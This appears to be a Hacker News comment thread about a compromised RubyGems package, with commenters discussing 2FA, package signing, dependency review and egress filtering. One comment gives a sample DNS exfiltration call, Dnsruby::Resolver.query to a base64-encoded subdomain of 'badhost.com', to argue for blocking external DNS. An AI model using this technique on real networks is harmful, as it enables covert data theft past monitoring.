Sure, as 2FA, signatures help with the problem that some people use weak passwords or share their passwords. But IMO it would be better to restrict upload rights to the top 100 maintainers and give them hsms they use to authenticate those uploads. Anyone wanting to upload would have to ask one of the maintainers to sponsor them. This would reduce the number of people you have to trust when building anything from the package repository.

Yep, we get the same shit with both NPM and Maven.

It's staggering the lack of consideration given to basic security by what should be competent software engineers.

There's still a lot to learn about this incident, but most likely the RubyGems account was compromised, allowing the attacker to upload whatever they wanted. Signed releases with a web of trust would be ideal, but I doubt we'll ever see that world. A simple and pragmatic solution would be to have the next version of bundler support the ability to only install packages published with 2 factor enabled, then the next major rails version default it to on, with plenty of advanced warning in 6.x/bundler. This still has plenty of gaps, such as an attacker being able to take over even with 2 factor, and then re-enabling it with their own keys, or RubyGems.org itself being compromised. It still represents a major upgrade in security for the entire Ruby ecosystem without causing much pain to authors and users.

This is a great reason why you should never allow unknown outgoing connections from Production.

You can implement this however makes sense for you. For me, the easiest thing is to run a simple locked down proxy server, and allow only specific domains there. This makes it easy to setup whatever rules you want, allowing entire domains, or only specific hosts. And it gives you a convenient place to log entries before you lock them down.

This is also why you shouldn't allow external DNS resolution from every host in your network. It would be just as easy to move data in and out with Dnsruby::Resolver.query('base64-encoded-payload.badhost.com', 'TXT'), 255 bytes at a time.

Once everything is moving through your proxy, there's no need to allow external DNS resolution from other hosts.

If an attacker has the ability to send dig queries to a remote host, he can over-ride anything you put in place on the host to prevent external DNS queries.

Also, most of this traffic is still unencrypted and dig'ging strange severs is noisy as hell. I'm pretty sure (famous last words) that most entry-level firewalls would flag this out of the box. If they don't, they should.

Still upvoted you though. This is an exfiltration technique that is really easy to spot and not widely known about.

Right, worry about outgoing traffic first, and DNS resolution second. And this goes for all traffic. Even ICMP can used to tunnel data.

> I went line by line linking to each library’s changeset. This due diligence never reported significant surprises to me, until this time.

Mad props to the author, Tute Costa, for doing this. It's a large investment of time for usually no return, so I think very few people do. And his (?) reaction to finding this was quite effective.

Thank you for your service sir.

If you have time and/or money and want to contribute to fixing this issue, please feel free to join in: https://github.com/rubygems/rubygems/issues/2496

The way I see it, the root of the problem is that there isn't an independently verifiable association between a package and code commit hash that it's been generated from. My GitHub page can have good code, but no one has any idea what's in the corresponding package.

Does the upcoming builtin package manager on GitHub solve this problem? Does it guarantee that packages are only built from code pushed to GitHub and that associate the commit hash in the metadata in some way?

Rubygem should contract an external auditor (security firm), this could go way deeper. Until they perform a throughout audit I will personally stay away from this project.

So why does this not apply to everything?

If "this could go way deeper" is your answer to a super unpopular rubygem getting hijacked, why isn't that just the default assumption then?

Do you only use thoroughly audited software projects? How do you manage that?

How do you suggest that Rubygems fund that effort? Also when you're staying away from Rubygems, which alternative will you be using, and do you think they have better security?

Incidents like this really show the lack of proper security measures in place. Why should package ownership be able to be arbitrarily shifted on a whim? It's a large signle point of failure. Sadly, there are no good alternatives besides entering in in GitHub repo paths manually for now.

We really need more signing support in language specific packaging.

why not just restrict the production environment to not open ports other than 80 and not to create TCP channels to unauthorized hosts?

It’s effective but tends to be a considerable amount of work to maintain, especially since the web is more dynamic these days: imagine what it would take to filter only authorized connections to a service hosted on AWS, for example, where anyone in the world can get IPs in the possible range and even put data on white-listed hostnames like S3. You’re basically building an allow list of host names, intermediating every update path, etc. and dealing with things which were designed with a more open model — e.g. do you disable things like OCSP or whitelist more third-party resources?

This also heavily encourages microservices since most non-trivial applications will have some reason to connect to fairly arbitrary resources. Hopefully that can be sandboxed well but relatively few apps were designed that way and that general class of missing things which weren’t supposed to work is notoriously easy for even experienced teams to miss.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact